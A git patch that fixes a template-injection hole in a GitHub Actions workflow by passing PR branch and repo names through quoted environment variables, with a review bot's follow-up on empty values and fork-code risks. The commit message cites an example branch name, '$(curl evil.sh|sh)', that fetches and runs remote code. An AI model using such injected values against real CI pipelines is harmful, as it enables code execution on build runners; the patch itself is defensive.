From 6b2100e435f1339b19adec02aa5b1e55472de58e Mon Sep 17 00:00:00 2001
From: Jan Nedbal
Date: Fri, 29 May 2026 14:53:39 +0200
Subject: [PATCH] Fix template injection in E2E workflow

The "Update Dead Code Detector" step expanded ${{ github.head_ref }} and ${{ github.event.pull_request.head.repo.full_name }} directly into the shell script. Both are attacker-controlled on fork PRs, so a branch name like $(curl evil.sh|sh) would be executed on the runner. Pass them via env vars and reference them as quoted shell variables so their values can no longer break out of the string context.

Flagged by zizmor (template-injection, High).

Co-Authored-By: Claude Code
---
 .github/workflows/e2e.yml | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/.github/workflows/e2e.yml b/.github/workflows/e2e.yml
index 8c27f74..f5bdb95 100644
--- a/.github/workflows/e2e.yml
+++ b/.github/workflows/e2e.yml
@@ -54,9 +54,12 @@ jobs:
       - name: Update Dead Code Detector
+        env:
+          HEAD_REPO: ${{ github.event.pull_request.head.repo.full_name }}
+          HEAD_REF: ${{ github.head_ref }}
         run: |
-          composer config repositories.pr vcs https://github.com/${{ github.event.pull_request.head.repo.full_name }}
-          composer require --dev shipmonk/dead-code-detector:dev-${{ github.head_ref }} --with-all-dependencies --minimal-changes
+          composer config repositories.pr vcs "https://github.com/$HEAD_REPO"
+          composer require --dev "shipmonk/dead-code-detector:dev-$HEAD_REF" --with-all-dependencies --minimal-changes
       - name: Run analysis
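Review bot: The new `run:` block has no guard for the case where `HEAD_REPO` or `HEAD_REF` expands to an empty string, which happens for any non-`pull_request` trigger (or when the head repo has been deleted) because `github.head_ref` and `github.event.pull_request.head.repo.full_name` are unset there; with the values now quoted, the step silently runs `composer config repositories.pr vcs "https://github.com/"` and `composer require ... "shipmonk/dead-code-detector:dev-"` instead of failing with a clear message. Adding `: "${HEAD_REPO:?head repo not set}" "${HEAD_REF:?head ref not set}"` as the first line of the script (or an `if: github.event_name == 'pull_request'` on the step) makes the precondition explicit. Separately, the injection is closed, but the step by design still clones and `composer require`s code from the fork named by these values, so composer plugins and scripts of that package will run on the runner; that is acceptable when the workflow is triggered by `pull_request` (read-only token, no secrets for forks), but would be a problem if the `on:` block, which is outside this hunk, uses `pull_request_target` — worth confirming, and `--no-plugins --no-scripts` could be added if the E2E run does not need them.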